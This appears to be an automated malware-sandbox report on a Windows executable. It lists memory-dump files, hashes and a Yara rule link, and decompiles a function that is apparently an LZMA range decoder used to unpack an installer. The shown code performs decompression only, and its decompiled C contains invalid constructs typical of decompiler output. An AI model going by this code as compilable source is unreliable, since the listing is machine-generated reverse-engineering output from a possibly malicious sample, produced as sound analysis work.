                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x00000000
                                            0x0040679d
                                            0x0040672b
                                            0x0040672b
                                            0x00406731
                                            0x00406734
                                            0x00406737
                                            0x0040673a
                                            0x0040673d
                                            0x00406740
                                            0x00406743
                                            0x00406746
                                            0x00406749
                                            0x0040674c
                                            0x00406765
                                            0x00406767
                                            0x0040676a
                                            0x0040676b
                                            0x0040676e
                                            0x00406770
                                            0x00406773
                                            0x00406775
                                            0x00406777
                                            0x0040677a
                                            0x0040677c
                                            0x0040677f
                                            0x00406783
                                            0x00406785
                                            0x00406785
                                            0x00406786
                                            0x00406789
                                            0x0040678c
                                            0x0040674e
                                            0x0040674e
                                            0x00406756
                                            0x0040675b
                                            0x0040675d
                                            0x00406760
                                            0x00406760
                                            0x0040678f
                                            0x00406796
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00000000
                                            0x00406798
                                            0x00406798
                                            0x00000000
                                            0x00406798
                                            0x00406796
                                            0x004066a9
                                            0x004066a9
                                            0x004066ac
                                            0x004066ae
                                            0x004066b1
                                            0x004066b4
                                            0x004066b7
                                            0x004066b9
                                            0x004066bc
                                            0x004066bf
                                            0x004066bf
                                            0x004066c2
                                            0x004066c2
                                            0x004066c5
                                            0x004066cc
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x00000000
                                            0x004066ce
                                            0x004066ce
                                            0x00000000
                                            0x004066ce
                                            0x004066cc
                                            0x00406652
                                            0x00406652
                                            0x00406655
                                            0x00406657
                                            0x0040665a
                                            0x00000000
                                            0x00000000
                                            0x004063b9
                                            0x004063b9
                                            0x004063bd
                                            0x00406a02
                                            0x00406a02
                                            0x00000000
                                            0x00406a02
                                            0x004063c3
                                            0x004063c3
                                            0x004063c6
                                            0x004063c9
                                            0x004063cc
                                            0x004063cf
                                            0x004063d2
                                            0x004063d5
                                            0x004063d7
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e2
                                            0x004063e2
                                            0x004063e2
                                            0x00000000
                                            0x00000000
                                            0x00406544
                                            0x00406544
                                            0x00406548
                                            0x00406a0e
                                            0x00406a0e
                                            0x00000000
                                            0x00406a0e
                                            0x0040654e
                                            0x0040654e
                                            0x00406551
                                            0x00406554
                                            0x00406557
                                            0x00406559
                                            0x00406559
                                            0x00406559
                                            0x0040655c
                                            0x0040655f
                                            0x00406562
                                            0x00406565
                                            0x00406568
                                            0x0040656b
                                            0x0040656c
                                            0x0040656e
                                            0x0040656e
                                            0x0040656e
                                            0x00406571
                                            0x00406574
                                            0x00406577
                                            0x0040657a
                                            0x0040657a
                                            0x0040657a
                                            0x0040657d
                                            0x0040657f
                                            0x0040657f
                                            0x00000000
                                            0x00000000
                                            0x004067c1
                                            0x004067c1
                                            0x004067c1
                                            0x004067c5
                                            0x00000000
                                            0x00000000
                                            0x004067cb
                                            0x004067cb
                                            0x004067ce
                                            0x004067d1
                                            0x004067d4
                                            0x004067d6
                                            0x004067d6
                                            0x004067d6
                                            0x004067d9
                                            0x004067dc
                                            0x004067df
                                            0x004067e2
                                            0x004067e5
                                            0x004067e8
                                            0x004067e9
                                            0x004067eb
                                            0x004067eb
                                            0x004067eb
                                            0x004067ee
                                            0x004067f1
                                            0x004067f4
                                            0x004067f7
                                            0x004067fa
                                            0x004067fe
                                            0x00406800
                                            0x00406803
                                            0x00000000
                                            0x00406805
                                            0x00406805
                                            0x00406582
                                            0x00406582
                                            0x00000000
                                            0x00406582
                                            0x00406803
                                            0x00406a38
                                            0x00406a38
                                            0x00000000
                                            0x00000000
                                            0x00406067
                                            0x00406a6f
                                            0x00406a6f
                                            0x00000000
                                            0x00406a6f
                                            0x004068bc
                                            0x0040693c
                                            0x00406905

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                            • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                                            • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                            • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040680A, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E0040680A() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
